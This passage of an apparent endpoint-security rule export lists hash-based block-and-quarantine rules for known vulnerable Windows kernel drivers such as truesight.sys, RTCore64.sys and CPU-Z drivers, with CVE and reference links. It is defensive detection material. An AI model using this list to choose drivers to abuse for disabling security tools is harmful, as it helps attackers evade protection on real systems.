"quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.822298Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "88cf314dbfc8b2b83f07cd8c381b9f2761b6a229392cca33a4104ce8973d204b", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "0c1de15c-e502-57a7-a78b-a4536695b801", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + 
"rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.611515Z", + "creation_date": "2026-03-23T11:45:29.611517Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.611522Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "94f39e23194d01698b2d8e7bb1c212bf192e81df59766d4adf5f7e33bbe13181", + "comment": "CPUID CPU-Z vulnerable driver (aka cpuz143_x64.sys) [CVE-2017-15302] [https://www.loldrivers.io/drivers/de003542-80e1-4aa0-9b99-ed8647a93a6e/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "0c24fe95-5f55-5133-8f41-ced83456dcc0", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.478943Z", + "creation_date": "2026-03-23T11:45:31.478955Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.478965Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": 
"963bf7142b9023687b95016e5a182a114acb16ed9860c1b4d3f5865226671805", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "0c436b7c-deb5-5a7e-9800-4692b4497446", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.149033Z", + "creation_date": "2026-03-23T11:45:31.149036Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.149045Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "bf943d2b77401c33550d46acc310c044eb8194332cb8c7ed07999ba8a02b9929", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "0c4672ee-de17-5b12-a783-addd9ac07e7f", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + 
"last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.821023Z", + "creation_date": "2026-03-23T11:45:31.821026Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.821035Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "7c27b79d4c1da8295b19c8375ca80875206d516010ff4112bdf30ae14763f84e", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "0c4d7fa4-db63-5a10-8970-9ffa11c9b446", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.817533Z", + "creation_date": "2026-03-23T11:45:31.817535Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.817541Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "6a0775d18fc9a3b24793b0f9d38a5dfc247efaad75bd335c4e543b4f55ba16ac", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware 
Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "0c53e645-593e-540d-8075-22c161acbb57", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.609902Z", + "creation_date": "2026-03-23T11:45:29.609904Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.609910Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "7b68763c39b45534854ec382434fd5a9640942c1f7393857af642ee327d4c570", + "comment": "Novell vulnerable driver (aka nicm.sys, nscm.sys and ncpl.sys) [CVE-2013-3956] [https://www.loldrivers.io/drivers/f4126206-564f-49f5-a942-2138a3131e0e/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "0c56d84b-293a-5505-a48d-9bf14fd51663", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.828578Z", + 
"creation_date": "2026-03-23T11:45:30.828580Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.828585Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "71724e2bd0c52ee13f77557b68cd7a8a4bc3d345bf0d6aa9653cc2102c8d10ec", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "0c5dba18-ed87-59d8-a37e-48202e9c6c1b", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.607918Z", + "creation_date": "2026-03-23T11:45:29.607920Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.607925Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "53eaefba7e7dca9ab74e385abf18762f9f1aa51594e7f7db5ba612d6c787dd7e", + "comment": "Micro-Star MSI Afterburner vulnerable driver (aka RTCore32.sys and RTCore64.sys) [CVE-2019-16098] [https://www.loldrivers.io/drivers/275c80c5-a67c-4536-b29e-4e481242cb01/] [file SHA256]", + "source": 
"af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "0c5dfaa5-bc6f-5bc1-8f1d-59e2c7afa09e", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.461353Z", + "creation_date": "2026-03-23T11:45:30.461356Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.461365Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "8f8956abdeb2a52be2cc514790a737a0ad39a9e698a77c1f358e77f1bf9f180b", + "comment": "Vulnerable Kernel Driver (aka sfdrvx64.sys) [https://www.loldrivers.io/drivers/5a03dc5a-115d-4d6f-b5b5-685f4c014a69/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "0c622c91-3e05-5868-8ffd-17da64ea8a0e", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.827291Z", + "creation_date": "2026-03-23T11:45:30.827293Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + 
"hl_testing_start_time": "2026-03-23T11:45:30.827299Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "dd502981546c9a28914b3a786172c5bd3945c1995dd4c34f251cb0d1d2ddc97e", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "0c6ada67-55fc-550d-b7b1-782a5b1b72c6", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.817169Z", + "creation_date": "2026-03-23T11:45:31.817171Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.817177Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "72b6c0305d2d264b0acf9caed51a831ca3916c958ede5c32018410a550376d8a", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "0c6f8bc1-d255-5994-a459-a74a81a0e8b4", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": 
"quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.488793Z", + "creation_date": "2026-03-23T11:45:31.488795Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.488801Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "3c06c78644bb55d97c74a4763c8f4889928b0e149877369b1bf8d801a660694d", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "0c6fbdc8-d550-5eeb-aa66-85cc232090ae", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.474347Z", + "creation_date": "2026-03-23T11:45:31.474350Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.474358Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + 
"rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "fe60f9bab775440a560b122a53102527bdf4573bd94c0de84de986e76991ab08", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "0c87d2c0-e3ad-51c9-9ba6-7ea2b5859cbf", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.821162Z", + "creation_date": "2026-03-23T11:45:30.821166Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.821174Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "0fc3bc6e81b04dcaa349f59f04d6c85c55a2fea5db8fa0ba53d3096a040ce5a7", + "comment": "Vulnerable Kernel Driver (aka ComputerZ.Sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "0c8fc1a9-2f9a-58cb-b95c-5d44ca101e26", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + 
"rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.825780Z", + "creation_date": "2026-03-23T11:45:30.825783Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.825788Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "85a577c789691e3805667ac56aafcf304230bf3c6885a8ec8392e334cce49cf0", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "0c9084e4-adea-509f-83d0-c60d5376eaab", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.157530Z", + "creation_date": "2026-03-23T11:45:31.157532Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.157537Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "8a9cd02916a4d08c36c592dce91e5c9e9d35a038fa4b95a6ad22d12800561b06", + "comment": "Vulnerable Adlice Software 
Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "0c976206-4181-5931-9267-3ab23140185f", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.488099Z", + "creation_date": "2026-03-23T11:45:31.488101Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.488106Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "7c0899364deaa8fd14bfd9a2bb8669b0dd586e5cff00568f9d36d731228f5579", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "0ca11f8f-872d-5ec8-a8df-724150f08f59", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", 
+ "last_update": "2026-03-23T11:45:30.455192Z", + "creation_date": "2026-03-23T11:45:30.455195Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.455204Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "b430d3a0bdb837a5d6625d3b1cef07abd1953f969869ff6cf7ba398ae605431a", + "comment": "Vulnerable Kernel Driver (aka Netfilter.sys) [https://www.loldrivers.io/drivers/9454a752-233e-4ba2-b585-8da242bf8f31/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "0ca331fe-0162-5cd9-87fd-5134e606007a", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.472274Z", + "creation_date": "2026-03-23T11:45:30.472278Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.472287Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "572c545b5a95d3f4d8c9808ebeff23f3c62ed41910eb162343dd5338e2d6b0b4", + "comment": "Vulnerable Kernel Driver (aka cpuz.sys) [https://www.loldrivers.io/drivers/0f59ce3b-20ac-41ba-8010-2abc74827eb8/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "0caa0fc2-1ba8-51df-a23d-94a19eccd905", + 
"test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.827907Z", + "creation_date": "2026-03-23T11:45:31.827909Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.827917Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "9f87173cf9fcab276073fbfd6b27a424dd09d8411dbba87cf6ba3374f1b19efe", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "0cae90df-b4a9-5c34-abbb-6d1df609dc5a", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.829272Z", + "creation_date": "2026-03-23T11:45:31.829275Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": 
"2026-03-23T11:45:31.829284Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "521b2e2f677df0224e3c0ccc829b2c71299058b5ea88c9b00ca6c3fdd622698d", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "0cb8c1a7-0921-531f-9df9-876ec067d8b3", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.828102Z", + "creation_date": "2026-03-23T11:45:30.828104Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.828109Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "7e88722b68e9fe0c7676aecc6829b9873b43d9b76e49d7678301891b6d6ecb35", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "0cbddf44-5dd5-5c60-a65e-0601b365806b", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + 
"effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.141594Z", + "creation_date": "2026-03-23T11:45:31.141596Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.141601Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "83278f083a9773ac1bad4f31363fed125e14528bdea0f941e5efd3dc1cb51c17", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "0cc21fb6-22ac-53fe-8e71-fa1adeaf48b7", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.828065Z", + "creation_date": "2026-03-23T11:45:30.828068Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.828073Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + 
